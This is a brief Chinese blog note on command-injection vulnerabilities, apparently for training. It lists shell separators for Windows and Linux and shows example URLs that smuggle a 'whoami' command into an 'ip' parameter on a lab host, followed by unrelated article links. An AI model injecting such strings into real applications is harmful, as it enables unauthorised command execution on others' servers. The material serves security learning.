命令执行漏洞

windows支持:

|           ping 127.0.0.1|whoami           ||              ping  2 || whoami (哪条名令为真执行那条)

&  &&   ping 127.0.0.1&&whoami

Linux支持:

;      127.0.0.1;whoami

|         127.0.0.1|whoami                    11    1||whoami  (哪条名令为真执行那条)

&&     127.0.0.1&&whoami

Example 1

http://192.168.106.154/commandexec/example1.php?ip=127.0.0.1;whoami

Example 2

http://192.168.106.154/commandexec/example2.php?ip=127.0.0.1%0awhoami

Example 3

http://192.168.106.154/commandexec/example3.php?ip=127.0.0.1|whoami

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

最新文章

  1. 解决 android 高低版本 webView 里内容 自适应屏幕的终极方法
  2. 在ubuntu 12.04 x64下编译hadoop2.4
  3. POJ1329题
  4. WCF SOAP
  5. 更改debian的软件源sources.list
  6. linux查看用户登录信息-w命令
  7. CentOS 6.4 文件夹打开方式
  8. 6-最基础的服务-es6写法
  9. 【翻译】ExtJS vs AngularJS
  10. 微信小程序开发07-列表页面怎么做
  11. 设置Delphi默认按utf8格式保存单元文件
  12. 方法调用 Controller的Action 参数
  13. HTML基础【4】:表格标签
  14. maven+springmvc出现:java.sql.SQLException: Unknown system variable 'query_cache_size'
  15. (八)lambda、列表生成式、字典转list排序
  16. 唐雎(jū)不辱使命
  17. Android 蓝牙通信——AndroidBluetoothManager
  18. SSH 不分配远程主机tty
  19. AOP学习总结
  20. 使用Keras开发神经网络

热门文章

  1. mysql 5.7.13 安装配置方法图文教程(win10) (转)
  2. CSS里有哪些常见的块级元素和行内元素以及其区别?
  3. ajaxupload 异步上传工具
  4. uart 超声波传感器数据读取
  5. Linux 网络子系统之网络协议接口层(二)
  6. nfs服务器与客户端配置
  7. KafkaStream时间戳问题CreateTime = -1引起的程序中断
  8. lua——string之string.gsub
  9. win7控制面板一打开就停止的解决方法
  10. http://www.casualarena.com/